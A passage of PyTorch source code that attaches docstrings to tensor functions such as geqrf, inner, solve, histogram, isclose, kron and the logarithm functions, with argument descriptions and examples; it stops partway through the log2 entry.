add_docstr(torch.geqrf,
r"""
geqrf(input, *, out=None) -> (Tensor, Tensor)
This is a low-level function for calling LAPACK's geqrf directly. This function
returns a namedtuple (a, tau) as defined in `LAPACK documentation for geqrf`_ .
Computes a QR decomposition of :attr:`input`.
Both `Q` and `R` matrices are stored in the same output tensor `a`.
The elements of `R` are stored on and above the diagonal.
Elementary reflectors (or Householder vectors) implicitly defining matrix `Q`
are stored below the diagonal.
The results of this function can be used together with :func:`torch.linalg.householder_product`
to obtain the `Q` matrix or
with :func:`torch.ormqr`, which uses an implicit representation of the `Q` matrix,
for an efficient matrix-matrix multiplication.
See `LAPACK documentation for geqrf`_ for further details.
.. note::
See also :func:`torch.linalg.qr`, which computes Q and R matrices, and :func:`torch.linalg.lstsq`
with the ``driver="gels"`` option for a function that can solve matrix equations using a QR decomposition.
Args:
input (Tensor): the input matrix
Keyword args:
out (tuple, optional): the output tuple of (Tensor, Tensor). Ignored if `None`. Default: `None`.
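Example (a minimal sketch: reconstructs the input from the returned factors using
:func:`torch.linalg.householder_product`; it assumes a well-conditioned random matrix,
so the tolerance below is illustrative)::
>>> A = torch.randn(3, 3)
>>> a, tau = torch.geqrf(A)
>>> Q = torch.linalg.householder_product(a, tau)
>>> R = a.triu()
>>> torch.allclose(Q @ R, A, atol=1e-5)
True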
.. _LAPACK documentation for geqrf:
http://www.netlib.org/lapack/explore-html/df/dc5/group__variants_g_ecomputational_ga3766ea903391b5cf9008132f7440ec7b.html
""")
add_docstr(torch.inner, r"""
inner(input, other, *, out=None) -> Tensor
Computes the dot product for 1D tensors. For higher dimensions, sums the product
of elements from :attr:`input` and :attr:`other` along their last dimension.
.. note::
If either :attr:`input` or :attr:`other` is a scalar, the result is equivalent
to `torch.mul(input, other)`.
If both :attr:`input` and :attr:`other` are non-scalars, the size of their last
dimension must match and the result is equivalent to `torch.tensordot(input,
other, dims=([-1], [-1]))`
Args:
input (Tensor): First input tensor
other (Tensor): Second input tensor
Keyword args:
out (Tensor, optional): Optional output tensor to write result into. The output
shape is `input.shape[:-1] + other.shape[:-1]`.
Example::
# Dot product
>>> torch.inner(torch.tensor([1, 2, 3]), torch.tensor([0, 2, 1]))
tensor(7)
# Multidimensional input tensors
>>> a = torch.randn(2, 3)
>>> a
tensor([[0.8173, 1.0874, 1.1784],
[0.3279, 0.1234, 2.7894]])
>>> b = torch.randn(2, 4, 3)
>>> b
tensor([[[-0.4682, -0.7159, 0.1506],
[ 0.4034, -0.3657, 1.0387],
[ 0.9892, -0.6684, 0.1774],
[ 0.9482, 1.3261, 0.3917]],
[[ 0.4537, 0.7493, 1.1724],
[ 0.2291, 0.5749, -0.2267],
[-0.7920, 0.3607, -0.3701],
[ 1.3666, -0.5850, -1.7242]]])
>>> torch.inner(a, b)
tensor([[[-0.9837, 1.1560, 0.2907, 2.6785],
[ 2.5671, 0.5452, -0.6912, -1.5509]],
[[ 0.1782, 2.9843, 0.7366, 1.5672],
[ 3.5115, -0.4864, -1.2476, -4.4337]]])
# Scalar input
>>> torch.inner(a, torch.tensor(2))
tensor([[1.6347, 2.1748, 2.3567],
[0.6558, 0.2469, 5.5787]])
""")
add_docstr(torch.outer, r"""
outer(input, vec2, *, out=None) -> Tensor
Outer product of :attr:`input` and :attr:`vec2`.
If :attr:`input` is a vector of size :math:`n` and :attr:`vec2` is a vector of
size :math:`m`, then :attr:`out` must be a matrix of size :math:`(n \times m)`.
.. note:: This function does not :ref:`broadcast <broadcasting-semantics>`.
Args:
input (Tensor): 1-D input vector
vec2 (Tensor): 1-D input vector
Keyword args:
out (Tensor, optional): optional output matrix
Example::
>>> v1 = torch.arange(1., 5.)
>>> v2 = torch.arange(1., 4.)
>>> torch.outer(v1, v2)
tensor([[ 1., 2., 3.],
[ 2., 4., 6.],
[ 3., 6., 9.],
[ 4., 8., 12.]])
""")
add_docstr(torch.ger,
r"""
ger(input, vec2, *, out=None) -> Tensor
Alias of :func:`torch.outer`.
.. warning::
This function is deprecated and will be removed in a future PyTorch release.
Use :func:`torch.outer` instead.
""")
add_docstr(torch.solve,
r"""
torch.solve(input, A, *, out=None) -> (Tensor, Tensor)
This function returns the solution to the system of linear
equations represented by :math:`AX = B` and the LU factorization of
A, in order as a namedtuple `solution, LU`.
`LU` contains `L` and `U` factors for LU factorization of `A`.
`torch.solve(B, A)` can take in 2D inputs `B, A` or inputs that are
batches of 2D matrices. If the inputs are batches, then returns
batched outputs `solution, LU`.
Supports real-valued and complex-valued inputs.
.. warning::
:func:`torch.solve` is deprecated in favor of :func:`torch.linalg.solve`
and will be removed in a future PyTorch release.
:func:`torch.linalg.solve` has its arguments reversed and does not return the
LU factorization of the input. To get the LU factorization see :func:`torch.lu`,
which may be used with :func:`torch.lu_solve` and :func:`torch.lu_unpack`.
``X = torch.solve(B, A).solution`` should be replaced with
.. code:: python
X = torch.linalg.solve(A, B)
.. note::
Irrespective of the original strides, the returned matrices
`solution` and `LU` will be transposed, i.e. with strides like
`B.contiguous().mT.stride()` and
`A.contiguous().mT.stride()` respectively.
Args:
input (Tensor): input matrix :math:`B` of size :math:`(*, m, k)` , where :math:`*`
is zero or more batch dimensions.
A (Tensor): input square matrix of size :math:`(*, m, m)`, where
:math:`*` is zero or more batch dimensions.
Keyword args:
out ((Tensor, Tensor), optional): optional output tuple.
Example::
>>> A = torch.tensor([[6.80, -2.11, 5.66, 5.97, 8.23],
... [-6.05, -3.30, 5.36, -4.44, 1.08],
... [-0.45, 2.58, -2.70, 0.27, 9.04],
... [8.32, 2.71, 4.35, -7.17, 2.14],
... [-9.67, -5.14, -7.26, 6.08, -6.87]]).t()
>>> B = torch.tensor([[4.02, 6.19, -8.22, -7.57, -3.03],
... [-1.56, 4.00, -8.67, 1.75, 2.86],
... [9.81, -4.09, -4.57, -8.61, 8.99]]).t()
>>> X, LU = torch.solve(B, A)
>>> torch.dist(B, torch.mm(A, X))
tensor(1.00000e-06 *
7.0977)
>>> # Batched solver example
>>> A = torch.randn(2, 3, 1, 4, 4)
>>> B = torch.randn(2, 3, 1, 4, 6)
>>> X, LU = torch.solve(B, A)
>>> torch.dist(B, A.matmul(X))
tensor(1.00000e-06 *
3.6386)
""")
add_docstr(torch.get_default_dtype,
r"""
get_default_dtype() -> torch.dtype
Get the current default floating point :class:`torch.dtype`.
Example::
>>> torch.get_default_dtype() # initial default for floating point is torch.float32
torch.float32
>>> torch.set_default_dtype(torch.float64)
>>> torch.get_default_dtype() # default is now changed to torch.float64
torch.float64
>>> torch.set_default_tensor_type(torch.FloatTensor) # setting tensor type also affects this
>>> torch.get_default_dtype() # changed to torch.float32, the dtype for torch.FloatTensor
torch.float32
""")
add_docstr(torch.get_num_threads,
r"""
get_num_threads() -> int
Returns the number of threads used for parallelizing CPU operations
""")
add_docstr(torch.get_num_interop_threads,
r"""
get_num_interop_threads() -> int
Returns the number of threads used for inter-op parallelism on CPU
(e.g. in JIT interpreter)
""")
add_docstr(torch.gt, r"""
gt(input, other, *, out=None) -> Tensor
Computes :math:`\text{input} > \text{other}` element-wise.
""" + r"""
The second argument can be a number or a tensor whose shape is
:ref:`broadcastable <broadcasting-semantics>` with the first argument.
Args:
input (Tensor): the tensor to compare
other (Tensor or float): the tensor or value to compare
Keyword args:
{out}
Returns:
A boolean tensor that is True where :attr:`input` is greater than :attr:`other` and False elsewhere
Example::
>>> torch.gt(torch.tensor([[1, 2], [3, 4]]), torch.tensor([[1, 1], [4, 4]]))
tensor([[False, True], [False, False]])
""".format(**common_args))
add_docstr(torch.greater, r"""
greater(input, other, *, out=None) -> Tensor
Alias for :func:`torch.gt`.
""")
add_docstr(torch.histc,
r"""
histc(input, bins=100, min=0, max=0, *, out=None) -> Tensor
Computes the histogram of a tensor.
The elements are sorted into equal width bins between :attr:`min` and
:attr:`max`. If :attr:`min` and :attr:`max` are both zero, the minimum and
maximum values of the data are used.
Elements lower than min and higher than max are ignored.
Args:
{input}
bins (int): number of histogram bins
min (Scalar): lower end of the range (inclusive)
max (Scalar): upper end of the range (inclusive)
Keyword args:
{out}
Returns:
Tensor: Histogram represented as a tensor
Example::
>>> torch.histc(torch.tensor([1., 2, 1]), bins=4, min=0, max=3)
tensor([ 0., 2., 1., 0.])
""".format(**common_args))
add_docstr(torch.histogram,
r"""
histogram(input, bins, *, range=None, weight=None, density=False, out=None) -> (Tensor, Tensor)
Computes a histogram of the values in a tensor.
:attr:`bins` can be an integer or a 1D tensor.
If :attr:`bins` is an int, it specifies the number of equal-width bins.
By default, the lower and upper range of the bins is determined by the
minimum and maximum elements of the input tensor. The :attr:`range`
argument can be provided to specify a range for the bins.
If :attr:`bins` is a 1D tensor, it specifies the sequence of bin edges
including the rightmost edge. It should contain at least 2 elements
and its elements should be increasing.
Args:
{input}
bins: int or 1D Tensor. If int, defines the number of equal-width bins. If tensor,
defines the sequence of bin edges including the rightmost edge.
Keyword args:
range (tuple of float): Defines the range of the bins.
weight (Tensor): If provided, weight should have the same shape as input. Each value in
input contributes its associated weight towards its bin's result.
density (bool): If False, the result will contain the count (or total weight) in each bin.
If True, the result is the value of the probability density function over the bins,
normalized such that the integral over the range of the bins is 1.
out (tuple, optional): The result tuple of two output tensors (hist, bin_edges).
Returns:
hist (Tensor): 1D Tensor containing the values of the histogram.
bin_edges(Tensor): 1D Tensor containing the edges of the histogram bins.
Example::
>>> torch.histogram(torch.tensor([1., 2, 1]), bins=4, range=(0., 3.), weight=torch.tensor([1., 2., 4.]))
(tensor([ 0., 5., 2., 0.]), tensor([0., 0.75, 1.5, 2.25, 3.]))
>>> torch.histogram(torch.tensor([1., 2, 1]), bins=4, range=(0., 3.), weight=torch.tensor([1., 2., 4.]), density=True)
(tensor([ 0., 0.9524, 0.3810, 0.]), tensor([0., 0.75, 1.5, 2.25, 3.]))
""".format(**common_args))
add_docstr(torch.hypot,
r"""
hypot(input, other, *, out=None) -> Tensor
Given the legs of a right triangle, return its hypotenuse.
.. math::
\text{out}_{i} = \sqrt{\text{input}_{i}^{2} + \text{other}_{i}^{2}}
The shapes of ``input`` and ``other`` must be
:ref:`broadcastable <broadcasting-semantics>`.
""" + r"""
Args:
input (Tensor): the first input tensor
other (Tensor): the second input tensor
Keyword args:
{out}
Example::
>>> torch.hypot(torch.tensor([4.0]), torch.tensor([3.0, 4.0, 5.0]))
tensor([5.0000, 5.6569, 6.4031])
""".format(**common_args))
add_docstr(torch.i0,
r"""
i0(input, *, out=None) -> Tensor
Alias for :func:`torch.special.i0`.
""")
add_docstr(torch.igamma,
r"""
igamma(input, other, *, out=None) -> Tensor
Alias for :func:`torch.special.gammainc`.
""")
add_docstr(torch.igammac,
r"""
igammac(input, other, *, out=None) -> Tensor
Alias for :func:`torch.special.gammaincc`.
""")
add_docstr(torch.index_select,
r"""
index_select(input, dim, index, *, out=None) -> Tensor
Returns a new tensor which indexes the :attr:`input` tensor along dimension
:attr:`dim` using the entries in :attr:`index` which is a `LongTensor`.
The returned tensor has the same number of dimensions as the original tensor
(:attr:`input`). The :attr:`dim`\ th dimension has the same size as the length
of :attr:`index`; other dimensions have the same size as in the original tensor.
.. note:: The returned tensor does **not** use the same storage as the original
tensor. If :attr:`out` has a different shape than expected, we
silently change it to the correct shape, reallocating the underlying
storage if necessary.
Args:
{input}
dim (int): the dimension in which we index
index (IntTensor or LongTensor): the 1-D tensor containing the indices to index
Keyword args:
{out}
Example::
>>> x = torch.randn(3, 4)
>>> x
tensor([[ 0.1427, 0.0231, -0.5414, -1.0009],
[-0.4664, 0.2647, -0.1228, -1.1068],
[-1.1734, -0.6571, 0.7230, -0.6004]])
>>> indices = torch.tensor([0, 2])
>>> torch.index_select(x, 0, indices)
tensor([[ 0.1427, 0.0231, -0.5414, -1.0009],
[-1.1734, -0.6571, 0.7230, -0.6004]])
>>> torch.index_select(x, 1, indices)
tensor([[ 0.1427, -0.5414],
[-0.4664, -0.1228],
[-1.1734, 0.7230]])
""".format(**common_args))
add_docstr(torch.inverse, r"""
inverse(input, *, out=None) -> Tensor
Alias for :func:`torch.linalg.inv`
""")
add_docstr(torch.isin, r"""
isin(elements, test_elements, *, assume_unique=False, invert=False) -> Tensor
Tests if each element of :attr:`elements` is in :attr:`test_elements`. Returns
a boolean tensor of the same shape as :attr:`elements` that is True for elements
in :attr:`test_elements` and False otherwise.
.. note::
One of :attr:`elements` or :attr:`test_elements` can be a scalar, but not both.
Args:
elements (Tensor or Scalar): Input elements
test_elements (Tensor or Scalar): Values against which to test for each input element
assume_unique (bool, optional): If True, assumes both :attr:`elements` and
:attr:`test_elements` contain unique elements, which can speed up the
calculation. Default: False
invert (bool, optional): If True, inverts the boolean return tensor, resulting in True
values for elements *not* in :attr:`test_elements`. Default: False
Returns:
A boolean tensor of the same shape as :attr:`elements` that is True for elements in
:attr:`test_elements` and False otherwise
Example::
>>> torch.isin(torch.tensor([[1, 2], [3, 4]]), torch.tensor([2, 3]))
tensor([[False, True],
[ True, False]])
""")
add_docstr(torch.isinf, r"""
isinf(input) -> Tensor
Tests if each element of :attr:`input` is infinite
(positive or negative infinity) or not.
.. note::
Complex values are infinite when their real or imaginary part is
infinite.
Args:
{input}
Returns:
A boolean tensor that is True where :attr:`input` is infinite and False elsewhere
Example::
>>> torch.isinf(torch.tensor([1, float('inf'), 2, float('-inf'), float('nan')]))
tensor([False, True, False, True, False])
""".format(**common_args))
add_docstr(torch.isposinf,
r"""
isposinf(input, *, out=None) -> Tensor
Tests if each element of :attr:`input` is positive infinity or not.
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.tensor([-float('inf'), float('inf'), 1.2])
>>> torch.isposinf(a)
tensor([False, True, False])
""".format(**common_args))
add_docstr(torch.isneginf,
r"""
isneginf(input, *, out=None) -> Tensor
Tests if each element of :attr:`input` is negative infinity or not.
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.tensor([-float('inf'), float('inf'), 1.2])
>>> torch.isneginf(a)
tensor([ True, False, False])
""".format(**common_args))
add_docstr(torch.isclose, r"""
isclose(input, other, rtol=1e-05, atol=1e-08, equal_nan=False) -> Tensor
Returns a new tensor with boolean elements representing if each element of
:attr:`input` is "close" to the corresponding element of :attr:`other`.
Closeness is defined as:
.. math::
\lvert \text{input} - \text{other} \rvert \leq \texttt{atol} + \texttt{rtol} \times \lvert \text{other} \rvert
""" + r"""
where :attr:`input` and :attr:`other` are finite. Where :attr:`input`
and/or :attr:`other` are nonfinite they are close if and only if
they are equal, with NaNs being considered equal to each other when
:attr:`equal_nan` is True.
Args:
input (Tensor): first tensor to compare
other (Tensor): second tensor to compare
atol (float, optional): absolute tolerance. Default: 1e-08
rtol (float, optional): relative tolerance. Default: 1e-05
equal_nan (bool, optional): if ``True``, then two ``NaN`` s will be considered equal. Default: ``False``
Examples::
>>> torch.isclose(torch.tensor((1., 2, 3)), torch.tensor((1 + 1e-10, 3, 4)))
tensor([ True, False, False])
>>> torch.isclose(torch.tensor((float('inf'), 4)), torch.tensor((float('inf'), 6)), rtol=.5)
tensor([True, True])
""")
add_docstr(torch.isfinite, r"""
isfinite(input) -> Tensor
Returns a new tensor with boolean elements representing if each element is `finite` or not.
Real values are finite when they are not NaN, negative infinity, or infinity.
Complex values are finite when both their real and imaginary parts are finite.
Args:
{input}
Returns:
A boolean tensor that is True where :attr:`input` is finite and False elsewhere
Example::
>>> torch.isfinite(torch.tensor([1, float('inf'), 2, float('-inf'), float('nan')]))
tensor([True, False, True, False, False])
""".format(**common_args))
add_docstr(torch.isnan, r"""
isnan(input) -> Tensor
Returns a new tensor with boolean elements representing if each element of :attr:`input`
is NaN or not. Complex values are considered NaN when either their real
and/or imaginary part is NaN.
Arguments:
{input}
Returns:
A boolean tensor that is True where :attr:`input` is NaN and False elsewhere
Example::
>>> torch.isnan(torch.tensor([1, float('nan'), 2]))
tensor([False, True, False])
""".format(**common_args))
add_docstr(torch.isreal, r"""
isreal(input) -> Tensor
Returns a new tensor with boolean elements representing if each element of :attr:`input` is real-valued or not.
All real-valued types are considered real. Complex values are considered real when their imaginary part is 0.
Arguments:
{input}
Returns:
A boolean tensor that is True where :attr:`input` is real and False elsewhere
Example::
>>> torch.isreal(torch.tensor([1, 1+1j, 2+0j]))
tensor([True, False, True])
""".format(**common_args))
add_docstr(torch.is_floating_point, r"""
is_floating_point(input) -> (bool)
Returns True if the data type of :attr:`input` is a floating point data type i.e.,
one of ``torch.float64``, ``torch.float32``, ``torch.float16``, and ``torch.bfloat16``.
Args:
{input}
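Example (illustrative sketch; assumes the default integer and floating point dtypes)::
>>> torch.is_floating_point(torch.tensor([1.0]))
True
>>> torch.is_floating_point(torch.tensor([1]))
False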
""".format(**common_args))
add_docstr(torch.is_complex, r"""
is_complex(input) -> (bool)
Returns True if the data type of :attr:`input` is a complex data type i.e.,
one of ``torch.complex64``, and ``torch.complex128``.
Args:
{input}
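Example (illustrative sketch; assumes the default complex and floating point dtypes)::
>>> torch.is_complex(torch.tensor([1.0 + 1.0j]))
True
>>> torch.is_complex(torch.tensor([1.0]))
False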
""".format(**common_args))
add_docstr(torch.is_grad_enabled, r"""
is_grad_enabled() -> (bool)
Returns True if grad mode is currently enabled.
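Example (a minimal sketch; assumes grad mode has not been disabled by an enclosing context)::
>>> torch.is_grad_enabled()
True
>>> with torch.no_grad():
...     print(torch.is_grad_enabled())
False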
""".format(**common_args))
add_docstr(torch.is_inference_mode_enabled, r"""
is_inference_mode_enabled() -> (bool)
Returns True if inference mode is currently enabled.
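Example (a minimal sketch; assumes inference mode has not been enabled by an enclosing context)::
>>> torch.is_inference_mode_enabled()
False
>>> with torch.inference_mode():
...     print(torch.is_inference_mode_enabled())
True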
""".format(**common_args))
add_docstr(torch.is_inference, r"""
is_inference(input) -> (bool)
Returns True if :attr:`input` is an inference tensor.
A non-view tensor is an inference tensor if and only if it was
allocated during inference mode. A view tensor is an inference
tensor if and only if the tensor it is a view of is an inference tensor.
For details on inference mode please see
`Inference Mode <https://pytorch.org/cppdocs/notes/inference_mode.html>`_.
Args:
{input}
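Example (a minimal sketch; the first tensor is allocated inside inference mode, the second is not)::
>>> with torch.inference_mode():
...     x = torch.ones(2)
>>> torch.is_inference(x)
True
>>> torch.is_inference(torch.ones(2))
False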
""".format(**common_args))
add_docstr(torch.is_conj, r"""
is_conj(input) -> (bool)
Returns True if the :attr:`input` is a conjugated tensor, i.e. its conjugate bit is set to `True`.
Args:
{input}
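Example (a minimal sketch; it assumes :meth:`torch.Tensor.conj` returns a lazily conjugated
view for complex tensors, which sets the conjugate bit)::
>>> x = torch.tensor([1.0 + 1.0j])
>>> torch.is_conj(x)
False
>>> torch.is_conj(x.conj())
True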
""".format(**common_args))
add_docstr(torch.is_nonzero, r"""
is_nonzero(input) -> (bool)
Returns True if the :attr:`input` is a single element tensor which is not equal to zero
after type conversions.
i.e. not equal to ``torch.tensor([0.])`` or ``torch.tensor([0])`` or
``torch.tensor([False])``.
Throws a ``RuntimeError`` if ``torch.numel(input) != 1`` (even in case
of sparse tensors).
Args:
{input}
Examples::
>>> torch.is_nonzero(torch.tensor([0.]))
False
>>> torch.is_nonzero(torch.tensor([1.5]))
True
>>> torch.is_nonzero(torch.tensor([False]))
False
>>> torch.is_nonzero(torch.tensor([3]))
True
>>> torch.is_nonzero(torch.tensor([1, 3, 5]))
Traceback (most recent call last):
...
RuntimeError: bool value of Tensor with more than one value is ambiguous
>>> torch.is_nonzero(torch.tensor([]))
Traceback (most recent call last):
...
RuntimeError: bool value of Tensor with no values is ambiguous
""".format(**common_args))
add_docstr(torch.kron,
r"""
kron(input, other, *, out=None) -> Tensor
Computes the Kronecker product, denoted by :math:`\otimes`, of :attr:`input` and :attr:`other`.
If :attr:`input` is a :math:`(a_0 \times a_1 \times \dots \times a_n)` tensor and :attr:`other` is a
:math:`(b_0 \times b_1 \times \dots \times b_n)` tensor, the result will be a
:math:`(a_0*b_0 \times a_1*b_1 \times \dots \times a_n*b_n)` tensor with the following entries:
.. math::
(\text{input} \otimes \text{other})_{k_0, k_1, \dots, k_n} =
\text{input}_{i_0, i_1, \dots, i_n} * \text{other}_{j_0, j_1, \dots, j_n},
where :math:`k_t = i_t * b_t + j_t` for :math:`0 \leq t \leq n`.
If one tensor has fewer dimensions than the other it is unsqueezed until it has the same number of dimensions.
Supports real-valued and complex-valued inputs.
.. note::
This function generalizes the typical definition of the Kronecker product for two matrices to two tensors,
as described above. When :attr:`input` is a :math:`(m \times n)` matrix and :attr:`other` is a
:math:`(p \times q)` matrix, the result will be a :math:`(p*m \times q*n)` block matrix:
.. math::
\mathbf{A} \otimes \mathbf{B}=\begin{bmatrix}
a_{11} \mathbf{B} & \cdots & a_{1 n} \mathbf{B} \\
\vdots & \ddots & \vdots \\
a_{m 1} \mathbf{B} & \cdots & a_{m n} \mathbf{B} \end{bmatrix}
where :attr:`input` is :math:`\mathbf{A}` and :attr:`other` is :math:`\mathbf{B}`.
Arguments:
input (Tensor)
other (Tensor)
Keyword args:
out (Tensor, optional): The output tensor. Ignored if ``None``. Default: ``None``
Examples::
>>> mat1 = torch.eye(2)
>>> mat2 = torch.ones(2, 2)
>>> torch.kron(mat1, mat2)
tensor([[1., 1., 0., 0.],
[1., 1., 0., 0.],
[0., 0., 1., 1.],
[0., 0., 1., 1.]])
>>> mat1 = torch.eye(2)
>>> mat2 = torch.arange(1, 5).reshape(2, 2)
>>> torch.kron(mat1, mat2)
tensor([[1., 2., 0., 0.],
[3., 4., 0., 0.],
[0., 0., 1., 2.],
[0., 0., 3., 4.]])
""")
add_docstr(torch.kthvalue,
r"""
kthvalue(input, k, dim=None, keepdim=False, *, out=None) -> (Tensor, LongTensor)
Returns a namedtuple ``(values, indices)`` where ``values`` is the :attr:`k` th
smallest element of each row of the :attr:`input` tensor in the given dimension
:attr:`dim`, and ``indices`` is the index location of each element found.
If :attr:`dim` is not given, the last dimension of the `input` is chosen.
If :attr:`keepdim` is ``True``, both the :attr:`values` and :attr:`indices` tensors
are the same size as :attr:`input`, except in the dimension :attr:`dim` where
they are of size 1. Otherwise, :attr:`dim` is squeezed
(see :func:`torch.squeeze`), resulting in both the :attr:`values` and
:attr:`indices` tensors having 1 fewer dimension than the :attr:`input` tensor.
.. note::
When :attr:`input` is a CUDA tensor and there are multiple valid
:attr:`k` th values, this function may nondeterministically return
:attr:`indices` for any of them.
Args:
{input}
k (int): k for the k-th smallest element
dim (int, optional): the dimension to find the kth value along
{keepdim}
Keyword args:
out (tuple, optional): the output tuple of (Tensor, LongTensor)
can be optionally given to be used as output buffers
Example::
>>> x = torch.arange(1., 6.)
>>> x
tensor([ 1., 2., 3., 4., 5.])
>>> torch.kthvalue(x, 4)
torch.return_types.kthvalue(values=tensor(4.), indices=tensor(3))
>>> x = torch.arange(1., 7.).resize_(2, 3)
>>> x
tensor([[ 1., 2., 3.],
[ 4., 5., 6.]])
>>> torch.kthvalue(x, 2, 0, True)
torch.return_types.kthvalue(values=tensor([[4., 5., 6.]]), indices=tensor([[1, 1, 1]]))
""".format(**single_dim_common))
add_docstr(torch.lcm,
r"""
lcm(input, other, *, out=None) -> Tensor
Computes the element-wise least common multiple (LCM) of :attr:`input` and :attr:`other`.
Both :attr:`input` and :attr:`other` must have integer types.
.. note::
This defines :math:`lcm(0, 0) = 0` and :math:`lcm(0, a) = 0`.
Args:
{input}
other (Tensor): the second input tensor
Keyword arguments:
{out}
Example::
>>> a = torch.tensor([5, 10, 15])
>>> b = torch.tensor([3, 4, 5])
>>> torch.lcm(a, b)
tensor([15, 20, 15])
>>> c = torch.tensor([3])
>>> torch.lcm(a, c)
tensor([15, 30, 15])
""".format(**common_args))
add_docstr(torch.ldexp, r"""
ldexp(input, other, *, out=None) -> Tensor
Multiplies :attr:`input` by 2**:attr:`other`.
.. math::
\text{out}_i = \text{input}_i * 2^{\text{other}_i}
""" + r"""
Typically this function is used to construct floating point numbers by multiplying
mantissas in :attr:`input` with integral powers of two created from the exponents
in :attr:`other`.
Args:
{input}
other (Tensor): a tensor of exponents, typically integers.
Keyword args:
{out}
Example::
>>> torch.ldexp(torch.tensor([1.]), torch.tensor([1]))
tensor([2.])
>>> torch.ldexp(torch.tensor([1.0]), torch.tensor([1, 2, 3, 4]))
tensor([ 2., 4., 8., 16.])
""".format(**common_args))
add_docstr(torch.le, r"""
le(input, other, *, out=None) -> Tensor
Computes :math:`\text{input} \leq \text{other}` element-wise.
""" + r"""
The second argument can be a number or a tensor whose shape is
:ref:`broadcastable <broadcasting-semantics>` with the first argument.
Args:
input (Tensor): the tensor to compare
other (Tensor or Scalar): the tensor or value to compare
Keyword args:
{out}
Returns:
A boolean tensor that is True where :attr:`input` is less than or equal to
:attr:`other` and False elsewhere
Example::
>>> torch.le(torch.tensor([[1, 2], [3, 4]]), torch.tensor([[1, 1], [4, 4]]))
tensor([[True, False], [True, True]])
""".format(**common_args))
add_docstr(torch.less_equal, r"""
less_equal(input, other, *, out=None) -> Tensor
Alias for :func:`torch.le`.
""")
add_docstr(torch.lerp,
r"""
lerp(input, end, weight, *, out=None)
Does a linear interpolation of two tensors :attr:`start` (given by :attr:`input`) and :attr:`end` based
on a scalar or tensor :attr:`weight` and returns the resulting :attr:`out` tensor.
.. math::
\text{out}_i = \text{start}_i + \text{weight}_i \times (\text{end}_i - \text{start}_i)
""" + r"""
The shapes of :attr:`start` and :attr:`end` must be
:ref:`broadcastable <broadcasting-semantics>`. If :attr:`weight` is a tensor, then
the shapes of :attr:`weight`, :attr:`start`, and :attr:`end` must be :ref:`broadcastable <broadcasting-semantics>`.
Args:
input (Tensor): the tensor with the starting points
end (Tensor): the tensor with the ending points
weight (float or tensor): the weight for the interpolation formula
Keyword args:
{out}
Example::
>>> start = torch.arange(1., 5.)
>>> end = torch.empty(4).fill_(10)
>>> start
tensor([ 1., 2., 3., 4.])
>>> end
tensor([ 10., 10., 10., 10.])
>>> torch.lerp(start, end, 0.5)
tensor([ 5.5000, 6.0000, 6.5000, 7.0000])
>>> torch.lerp(start, end, torch.full_like(start, 0.5))
tensor([ 5.5000, 6.0000, 6.5000, 7.0000])
""".format(**common_args))
add_docstr(torch.lgamma,
r"""
lgamma(input, *, out=None) -> Tensor
Computes the natural logarithm of the absolute value of the gamma function on :attr:`input`.
.. math::
\text{out}_{i} = \ln \Gamma(|\text{input}_{i}|)
""" + """
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.arange(0.5, 2, 0.5)
>>> torch.lgamma(a)
tensor([ 0.5724, 0.0000, -0.1208])
""".format(**common_args))
add_docstr(torch.linspace, r"""
linspace(start, end, steps, *, out=None, dtype=None, layout=torch.strided, device=None, requires_grad=False) -> Tensor
Creates a one-dimensional tensor of size :attr:`steps` whose values are evenly
spaced from :attr:`start` to :attr:`end`, inclusive. That is, the values are:
.. math::
(\text{start},
\text{start} + \frac{\text{end} - \text{start}}{\text{steps} - 1},
\ldots,
\text{start} + (\text{steps} - 2) * \frac{\text{end} - \text{start}}{\text{steps} - 1},
\text{end})
""" + """
.. warning::
Not providing a value for :attr:`steps` is deprecated. For backwards
compatibility, not providing a value for :attr:`steps` will create a tensor
with 100 elements. Note that this behavior is not reflected in the
documented function signature and should not be relied on. In a future
PyTorch release, failing to provide a value for :attr:`steps` will throw a
runtime error.
Args:
start (float): the starting value for the set of points
end (float): the ending value for the set of points
steps (int): size of the constructed tensor
Keyword arguments:
{out}
dtype (torch.dtype, optional): the data type to perform the computation in.
Default: if None, uses the global default dtype (see torch.get_default_dtype())
when both :attr:`start` and :attr:`end` are real,
and corresponding complex dtype when either is complex.
{layout}
{device}
{requires_grad}
Example::
>>> torch.linspace(3, 10, steps=5)
tensor([ 3.0000, 4.7500, 6.5000, 8.2500, 10.0000])
>>> torch.linspace(-10, 10, steps=5)
tensor([-10., -5., 0., 5., 10.])
>>> torch.linspace(start=-10, end=10, steps=5)
tensor([-10., -5., 0., 5., 10.])
>>> torch.linspace(start=-10, end=10, steps=1)
tensor([-10.])
""".format(**factory_common_args))
add_docstr(torch.log,
r"""
log(input, *, out=None) -> Tensor
Returns a new tensor with the natural logarithm of the elements
of :attr:`input`.
.. math::
y_{i} = \log_{e} (x_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(5)
>>> a
tensor([-0.7168, -0.5471, -0.8933, -1.4428, -0.1190])
>>> torch.log(a)
tensor([ nan, nan, nan, nan, nan])
""".format(**common_args))
add_docstr(torch.log10,
r"""
log10(input, *, out=None) -> Tensor
Returns a new tensor with the logarithm to the base 10 of the elements
of :attr:`input`.
.. math::
y_{i} = \log_{10} (x_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.rand(5)
>>> a
tensor([ 0.5224, 0.9354, 0.7257, 0.1301, 0.2251])
>>> torch.log10(a)
tensor([-0.2820, -0.0290, -0.1392, -0.8857, -0.6476])
""".format(**common_args))
add_docstr(torch.log1p,
r"""
log1p(input, *, out=None) -> Tensor
Returns a new tensor with the natural logarithm of (1 + :attr:`input`).
.. math::
y_i = \log_{e} (x_i + 1)
""" + r"""
.. note:: This function is more accurate than :func:`torch.log` for small
values of :attr:`input`
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(5)
>>> a
tensor([-1.0090, -0.9923, 1.0249, -0.5372, 0.2492])
>>> torch.log1p(a)
tensor([ nan, -4.8653, 0.7055, -0.7705, 0.2225])
""".format(**common_args))
add_docstr(torch.log2,
r"""
log2(input, *, out=None) -> Tensor
Returns a new tensor with the logarithm to the base 2 of the elements
of :attr:`input`.
.. math::
y_{i} = \log_{2} (x_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.rand(5)
>>> a
tensor([ 0.8419, 0.8003, 0.9971, 0.5287, 0.0490])
>>> torch.log2(a)
